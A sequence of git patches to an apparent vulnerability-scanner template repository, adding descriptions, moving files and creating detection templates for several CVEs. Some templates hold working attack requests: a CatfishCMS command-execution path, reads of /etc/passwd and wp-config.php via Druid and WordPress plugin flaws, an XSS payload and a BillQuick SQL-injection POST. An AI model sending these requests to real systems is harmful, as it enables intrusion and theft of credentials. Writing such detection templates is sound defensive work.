https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ tags: wordpress,wp-plugin From 9f8270bb7a4857ec0754eaa59c96a3f4f6137711 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:54:49 +0300 Subject: [PATCH 3178/4083] Add description --- vulnerabilities/other/webui-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/webui-rce.yaml b/vulnerabilities/other/webui-rce.yaml index 82d1fab54a..384fe2d49f 100644 --- a/vulnerabilities/other/webui-rce.yaml +++ b/vulnerabilities/other/webui-rce.yaml @@ -3,6 +3,7 @@ info: name: WebUI 1.5b6 RCE author: pikpikcu severity: critical + description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. reference: https://www.exploit-db.com/exploits/36821 tags: webui,rce From 3029da4ceb8d8c288f22da073e7d6dbcd08994fb Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:55:23 +0300 Subject: [PATCH 3179/4083] Add description --- vulnerabilities/other/unauth-spark-api.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/unauth-spark-api.yaml b/vulnerabilities/other/unauth-spark-api.yaml index 8a936e9aa0..56ccbcbe76 100644 --- a/vulnerabilities/other/unauth-spark-api.yaml +++ b/vulnerabilities/other/unauth-spark-api.yaml @@ -3,6 +3,7 @@ info: name: Unauthenticated Spark REST API author: princechaddha severity: medium + description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it. reference: https://xz.aliyun.com/t/2490 tags: spark,unauth From 319c8a830e9aade672d3dbb6f33c407f806c4d83 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:56:03 +0300 Subject: [PATCH 3180/4083] Add description --- vulnerabilities/other/vpms-auth-bypass.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index 6f612b4f78..a59b7b3bd1 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -4,6 +4,7 @@ info: name: Vehicle Parking Management System 1.0 - Authentication Bypass author: dwisiswant0 severity: high + description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter. reference: https://www.exploit-db.com/exploits/48877 tags: auth-bypass requests: From f9fb28277015cba688cbfee2c47a32ad833a0b6f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:57:40 +0300 Subject: [PATCH 3181/4083] Add description --- vulnerabilities/other/viewlinc-crlf-injection.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/viewlinc-crlf-injection.yaml b/vulnerabilities/other/viewlinc-crlf-injection.yaml index c1e677dcb7..199d945cd7 100644 --- a/vulnerabilities/other/viewlinc-crlf-injection.yaml +++ b/vulnerabilities/other/viewlinc-crlf-injection.yaml @@ -4,6 +4,7 @@ info: name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection. author: geeknik severity: low + description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned. reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system tags: crlf,viewlinc From e4018d4a0c54552db90609699790ef47d52f56a1 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:58:22 +0300 Subject: [PATCH 3182/4083] Add description --- vulnerabilities/other/ueditor-file-upload.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/ueditor-file-upload.yaml b/vulnerabilities/other/ueditor-file-upload.yaml index 07225c62db..733c46e297 100644 --- a/vulnerabilities/other/ueditor-file-upload.yaml +++ b/vulnerabilities/other/ueditor-file-upload.yaml @@ -3,6 +3,7 @@ info: name: UEditor Arbitrary File Upload author: princechaddha severity: high + description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code. reference: - https://zhuanlan.zhihu.com/p/85265552 - https://www.freebuf.com/vuls/181814.html From 081a2546fefd906ac50420a5175a6576a93f827f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 25 Oct 2021 12:59:08 +0300 Subject: [PATCH 3183/4083] Add description --- vulnerabilities/other/wems-manager-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml index b73ec6dc84..db201ad502 100644 --- a/vulnerabilities/other/wems-manager-xss.yaml +++ b/vulnerabilities/other/wems-manager-xss.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium tags: xss - + description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter. reference: - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html From a197ec8370d00a0d9a634a28b4d75eeb62a28794 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 25 Oct 2021 16:03:46 +0530 Subject: [PATCH 3184/4083] misc formatting update --- file/python/python-scanner.yaml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index 6f7b8770d6..6542b33797 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -4,7 +4,7 @@ info: name: Python Scanner author: majidmc2 severity: info - description: Scan for dangerous Python functions + description: Indicators for dangerous Python functions reference: - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html @@ -17,7 +17,8 @@ file: extractors: - type: regex - name: Possible Code Injection + name: code-injection + condition: or regex: - 'exec' - 'eval' @@ -25,7 +26,8 @@ file: - type: regex - name: Possible Command Injection + name: command-injection + condition: or regex: - 'subprocess.call\(.*shell=True.*\)' - 'os.system' @@ -33,18 +35,19 @@ file: - type: regex - name: Possibly Unpickling untrusted source + name: untrusted-source + condition: or regex: - 'pickle.loads' - 'cPickle.loads' - type: regex - name: Possibly loading dangerous YAMLs + name: dangerous-yaml regex: - 'yaml.load' - type: regex - name: Possible SQLi + name: sqli regex: - - 'cursor.execute' + - 'cursor.execute' \ No newline at end of file From 0c87175275a00c505d07f4ec2e8ddf251ab98b5d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 16:24:44 +0530 Subject: [PATCH 3185/4083] Create CNVD-2019-06255.yaml --- cnvd/CNVD-2019-06255.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cnvd/CNVD-2019-06255.yaml diff --git a/cnvd/CNVD-2019-06255.yaml b/cnvd/CNVD-2019-06255.yaml new file mode 100644 index 0000000000..ebde1670fe --- /dev/null +++ b/cnvd/CNVD-2019-06255.yaml @@ -0,0 +1,27 @@ +id: CNVD-2019-06255 +info: + name: CatfishCMS RCE + author: Lark-Lab + severity: medium + reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/ + tags: rce,cvnd,catfishcms + +requests: + - method: GET + path: + - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system" + + redirects: true + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'OS' + - 'PATH' + - 'SHELL' + - 'USER' + condition: and From 0eb9092fe2c103011761e6157188208e0b15dece Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 25 Oct 2021 10:55:07 +0000 Subject: [PATCH 3186/4083] Auto README Update [Mon Oct 25 10:55:07 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 47d02bb65e..46fe32d081 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**176 directories, 2418 files**. +**177 directories, 2443 files**. From 7ca507d5eed578450e08b17dcfb2d2da0643cd0e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 16:49:18 +0530 Subject: [PATCH 3187/4083] Update CNVD-2019-06255.yaml --- cnvd/CNVD-2019-06255.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cnvd/CNVD-2019-06255.yaml b/cnvd/CNVD-2019-06255.yaml index ebde1670fe..82b7c18ae9 100644 --- a/cnvd/CNVD-2019-06255.yaml +++ b/cnvd/CNVD-2019-06255.yaml @@ -11,13 +11,12 @@ requests: path: - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system" - redirects: true - matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'OS' From e30362f0ab493a81f6d6f787ceacc5b43e739d85 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 25 Oct 2021 17:08:57 +0530 Subject: [PATCH 3188/4083] extractors doesn't support "condition" attribute explicitly --- file/python/python-scanner.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/file/python/python-scanner.yaml b/file/python/python-scanner.yaml index 6542b33797..c949abfae5 100644 --- a/file/python/python-scanner.yaml +++ b/file/python/python-scanner.yaml @@ -18,7 +18,6 @@ file: extractors: - type: regex name: code-injection - condition: or regex: - 'exec' - 'eval' @@ -27,7 +26,6 @@ file: - type: regex name: command-injection - condition: or regex: - 'subprocess.call\(.*shell=True.*\)' - 'os.system' @@ -36,7 +34,6 @@ file: - type: regex name: untrusted-source - condition: or regex: - 'pickle.loads' - 'cPickle.loads' From 1db2405c25e4ef807ad8d961fd585f75b0eeade3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 25 Oct 2021 17:30:48 +0530 Subject: [PATCH 3189/4083] Create CVE-2021-36749.yaml --- cves/2021/CVE-2021-36749.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2021/CVE-2021-36749.yaml diff --git a/cves/2021/CVE-2021-36749.yaml b/cves/2021/CVE-2021-36749.yaml new file mode 100644 index 0000000000..c0f1e3224e --- /dev/null +++ b/cves/2021/CVE-2021-36749.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-36749 + +info: + name: Apache Druid Authentication Restrictions Bypass + author: _0xf4n9x_ + severity: medium + description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-36749 + - https://www.cvedetails.com/cve/CVE-2021-36749/ + - https://github.com/BrucessKING/CVE-2021-36749 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 6.5 + cve-id: CVE-2021-36749 + cwe-id: CWE-668 + tags: cve,cve2021,apache,lfi,auth-bypass + +requests: + - raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - "druid:*:1000:1000:" + condition: or From f37ac4f60b7ce602c6f6a7e342cd2d5ae7cf3957 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 25 Oct 2021 20:05:08 +0700 Subject: [PATCH 3190/4083] Create CVE-2016-1000136.yaml --- cves/2016/CVE-2016-1000136.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2016/CVE-2016-1000136.yaml diff --git a/cves/2016/CVE-2016-1000136.yaml b/cves/2016/CVE-2016-1000136.yaml new file mode 100644 index 0000000000..b939c0b525 --- /dev/null +++ b/cves/2016/CVE-2016-1000136.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000136 + +info: + name: heat-trackr v1.0 - Reflected Cross-Site Scripting (XSS) via heat-trackr_abtest_add.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin heat-trackr v1.0 + reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=798 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - '"><"' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 3c21e2fc163b4fe6dfbf2ccb5415f7fffefc7b19 Mon Sep 17 00:00:00 2001 From: Philipp Dahse Date: Mon, 25 Oct 2021 15:45:49 +0200 Subject: [PATCH 3191/4083] Add Redis Commander Panel Detection Redis Commander is a common ui for redis. Access to Redis Commander can allow access to redis and expose sensible session or cache data. --- exposed-panels/redis-commander-exposure.yaml | 22 ++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/redis-commander-exposure.yaml diff --git a/exposed-panels/redis-commander-exposure.yaml b/exposed-panels/redis-commander-exposure.yaml new file mode 100644 index 0000000000..fea8a67df6 --- /dev/null +++ b/exposed-panels/redis-commander-exposure.yaml @@ -0,0 +1,22 @@ +id: redis-commander-exposure + +info: + name: Redis Commander Exposure + author: dahse89 + severity: low + reference: + - https://joeferner.github.io/redis-commander/ + - https://github.com/joeferner/redis-commander + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "Redis Commander" + - "redisCommanderBearerToken" + condition: and From e8d0bd1e7e8eca0f731f9aa73030a7d8b2462253 Mon Sep 17 00:00:00 2001 From: johnk3r <johnatan2camargo@gmail.com> Date: Mon, 25 Oct 2021 19:27:44 -0300 Subject: [PATCH 3192/4083] Create sugarcrm-panel.yaml --- exposed-panels/sugarcrm-panel.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/sugarcrm-panel.yaml diff --git a/exposed-panels/sugarcrm-panel.yaml b/exposed-panels/sugarcrm-panel.yaml new file mode 100644 index 0000000000..cd23c86b30 --- /dev/null +++ b/exposed-panels/sugarcrm-panel.yaml @@ -0,0 +1,25 @@ +id: sugarcrm-panel + +info: + name: Detect SugarCRM Panel + author: johnk3r + reference: https://www.shodan.io/search?query=sugarcrm + severity: info + tags: sugarcrm,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/index.php?action=Login&module=Users" + + matchers-condition: and + matchers: + - type: word + words: + - "<title>SugarCRM" + part: body + + - type: status + status: + - 200 From 6639cb99cc65244e31fca64838a7bd3a102b61f0 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 26 Oct 2021 08:02:31 +0900 Subject: [PATCH 3193/4083] Create wp-javospot-premium-theme-lfi.yaml --- wp-javospot-premium-theme-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 wp-javospot-premium-theme-lfi.yaml diff --git a/wp-javospot-premium-theme-lfi.yaml b/wp-javospot-premium-theme-lfi.yaml new file mode 100644 index 0000000000..d616291a71 --- /dev/null +++ b/wp-javospot-premium-theme-lfi.yaml @@ -0,0 +1,26 @@ +id: wp-javospot-premium-theme-lfi + +info: + name: Javo Spot Premium Theme - Unauthenticated Directory Traversal + author: 0x_Akoko + severity: high + tags: wordpress,wp-theme,lfi,wp + reference: https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php? jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 5ad972dc6bf9b8e3fd776e13772b2893cc7b0750 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 26 Oct 2021 08:04:56 +0900 Subject: [PATCH 3194/4083] Create CVE-2015-5471.yaml --- CVE-2015-5471.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 CVE-2015-5471.yaml diff --git a/CVE-2015-5471.yaml b/CVE-2015-5471.yaml new file mode 100644 index 0000000000..4c6adff168 --- /dev/null +++ b/CVE-2015-5471.yaml @@ -0,0 +1,23 @@ +id: CVE-2015-5471 +info: + name: Swim Team <= v1.44.10777 - Local File Inclusion + author: 0x_Akoko + severity: high + reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 + tags: wordpress,plugin,wp,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From c3c2fb4945664c5e204accdbe3da55d69a291c73 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 26 Oct 2021 08:09:35 +0900 Subject: [PATCH 3195/4083] Create wp-tinymce-thumbnail-plugin-lfi.yaml --- wp-tinymce-thumbnail-plugin-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 wp-tinymce-thumbnail-plugin-lfi.yaml diff --git a/wp-tinymce-thumbnail-plugin-lfi.yaml b/wp-tinymce-thumbnail-plugin-lfi.yaml new file mode 100644 index 0000000000..0ae06d6b01 --- /dev/null +++ b/wp-tinymce-thumbnail-plugin-lfi.yaml @@ -0,0 +1,26 @@ +id: wp-tinymce-thumbnail-plugin-lfi + +info: + name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI + author: 0x_Akoko + severity: high + tags: wordpress,wp-theme,lfi,wp + reference: https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From bf7070dbc786b501601d8030337c328d4dc26e2e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 26 Oct 2021 15:26:22 +0700 Subject: [PATCH 3196/4083] Add CVE-2021-42258 --- cves/2021/CVE-2021-42258.yaml | 66 +++++++++++++++++++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 cves/2021/CVE-2021-42258.yaml diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml new file mode 100644 index 0000000000..203f286368 --- /dev/null +++ b/cves/2021/CVE-2021-42258.yaml @@ -0,0 +1,66 @@ +id: CVE-2021-42258 + +info: + name: BillQuick Web Suite SQLi + author: dwisiswant0 + severity: high + tags: bqe,cve,cve2021,sqli + description: | + This template supports the detection part only. See references. + + BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 + allows SQL injection for unauthenticated remote code execution, + as exploited in the wild in October 2021 for ransomware installation. + SQL injection can, for example, use the txtID (aka username) parameter. + Successful exploitation can include the ability to execute + arbitrary code as MSSQLSERVER$ via xp_cmdshell. + reference: https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Origin: {{RootURL}} + Connection: close + Content-Type: application/x-www-form-urlencoded + + __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 + + cookie-reuse: true + extractors: + - type: xpath + name: VS + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__VIEWSTATE']" + + - type: xpath + name: VSG + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']" + + - type: xpath + name: EV + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__EVENTVALIDATION']" + + matchers: + - type: word + part: body + words: + - "Incorrect syntax near" + - "_ACCOUNTLOCKED" + + + From 9773130879cc402a823b2c2a91db5f878987fdfa Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 26 Oct 2021 15:31:41 +0700 Subject: [PATCH 3197/4083] Remove blank lines --- cves/2021/CVE-2021-42258.yaml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml index 203f286368..47adea9eea 100644 --- a/cves/2021/CVE-2021-42258.yaml +++ b/cves/2021/CVE-2021-42258.yaml @@ -60,7 +60,4 @@ requests: part: body words: - "Incorrect syntax near" - - "_ACCOUNTLOCKED" - - - + - "_ACCOUNTLOCKED" \ No newline at end of file From 1986e1211d358891cc0dea5344e41b8b3130c0fa Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 26 Oct 2021 14:25:37 +0530 Subject: [PATCH 3198/4083] Adding condition between word matcher --- cves/2021/CVE-2021-42258.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml index 47adea9eea..2920990570 100644 --- a/cves/2021/CVE-2021-42258.yaml +++ b/cves/2021/CVE-2021-42258.yaml @@ -27,7 +27,6 @@ requests: Host: {{Hostname}} Referer: {{BaseURL}} Origin: {{RootURL}} - Connection: close Content-Type: application/x-www-form-urlencoded __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 @@ -58,6 +57,8 @@ requests: matchers: - type: word part: body + condition: and words: + - "System.Data.SqlClient.SqlException" - "Incorrect syntax near" - - "_ACCOUNTLOCKED" \ No newline at end of file + - "_ACCOUNTLOCKED" From 2fa9791bdcab1aea46b2ffc0d84552876e2c9bee Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 26 Oct 2021 14:32:23 +0530 Subject: [PATCH 3199/4083] misc update --- cves/2021/CVE-2021-42258.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml index 2920990570..64def1d504 100644 --- a/cves/2021/CVE-2021-42258.yaml +++ b/cves/2021/CVE-2021-42258.yaml @@ -4,17 +4,17 @@ info: name: BillQuick Web Suite SQLi author: dwisiswant0 severity: high - tags: bqe,cve,cve2021,sqli + tags: cve,cve2021,sqli,billquick description: | - This template supports the detection part only. See references. - BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution, as exploited in the wild in October 2021 for ransomware installation. SQL injection can, for example, use the txtID (aka username) parameter. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell. - reference: https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware + reference: + - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware + - https://nvd.nist.gov/vuln/detail/CVE-2021-42258 requests: - raw: From 8fb9b08e61721144ad21a0baa876ed7512ab7383 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 26 Oct 2021 15:02:32 +0530 Subject: [PATCH 3200/4083] misc update --- .github/workflows/template-validate.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index a158694063..705f870c7e 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -20,10 +20,8 @@ jobs: - name: Installing Nuclei # if: steps.cache-go.outputs.cache-hit != 'true' - env: - GO111MODULE: on run: | - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev + go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest shell: bash - name: Template Validation From fb81f4ca362fa57569909200cb7445795cfba33f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 12:35:56 +0300 Subject: [PATCH 3201/4083] Better description --- vulnerabilities/wordpress/wp-upload-data.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-upload-data.yaml b/vulnerabilities/wordpress/wp-upload-data.yaml index 8539ff6058..9a474dff0a 100644 --- a/vulnerabilities/wordpress/wp-upload-data.yaml +++ b/vulnerabilities/wordpress/wp-upload-data.yaml @@ -4,7 +4,7 @@ info: name: wordpress-upload-data author: pussycat0x severity: medium - description: Searches for Passwords in the wordpress uploads directory. + description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it. reference: https://www.exploit-db.com/ghdb/7040 tags: wordpress,listing From 423584f1b71b7be0f58fe6568bfd6742f51f698e Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 26 Oct 2021 15:08:26 +0530 Subject: [PATCH 3202/4083] moving files around --- .../wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename wp-tinymce-thumbnail-plugin-lfi.yaml => vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml (93%) diff --git a/wp-tinymce-thumbnail-plugin-lfi.yaml b/vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml similarity index 93% rename from wp-tinymce-thumbnail-plugin-lfi.yaml rename to vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml index 0ae06d6b01..33592aa212 100644 --- a/wp-tinymce-thumbnail-plugin-lfi.yaml +++ b/vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml @@ -4,7 +4,7 @@ info: name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI author: 0x_Akoko severity: high - tags: wordpress,wp-theme,lfi,wp + tags: wordpress,wp-theme,lfi,wordpress reference: https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400 requests: @@ -15,11 +15,11 @@ requests: matchers-condition: and matchers: - type: word + part: body + condition: and words: - "DB_NAME" - "DB_PASSWORD" - part: body - condition: and - type: status status: From 1e9218db989340a90cd90069592a5a09eb19fe74 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 26 Oct 2021 15:13:55 +0530 Subject: [PATCH 3203/4083] moving files around --- CVE-2015-5471.yaml => cves/2015/CVE-2015-5471.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename CVE-2015-5471.yaml => cves/2015/CVE-2015-5471.yaml (92%) diff --git a/CVE-2015-5471.yaml b/cves/2015/CVE-2015-5471.yaml similarity index 92% rename from CVE-2015-5471.yaml rename to cves/2015/CVE-2015-5471.yaml index 4c6adff168..c2d47397d1 100644 --- a/CVE-2015-5471.yaml +++ b/cves/2015/CVE-2015-5471.yaml @@ -4,7 +4,7 @@ info: author: 0x_Akoko severity: high reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 - tags: wordpress,plugin,wp,lfi + tags: cve,cve2015,wordpress,wp-plugin,lfi requests: - method: GET From 9c96179595244775a99b53311e59ef80e0c193eb Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 12:45:16 +0300 Subject: [PATCH 3204/4083] Fix description --- vulnerabilities/other/solar-log-authbypass.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/solar-log-authbypass.yaml b/vulnerabilities/other/solar-log-authbypass.yaml index 382d65e232..7e3f5cd21d 100644 --- a/vulnerabilities/other/solar-log-authbypass.yaml +++ b/vulnerabilities/other/solar-log-authbypass.yaml @@ -4,7 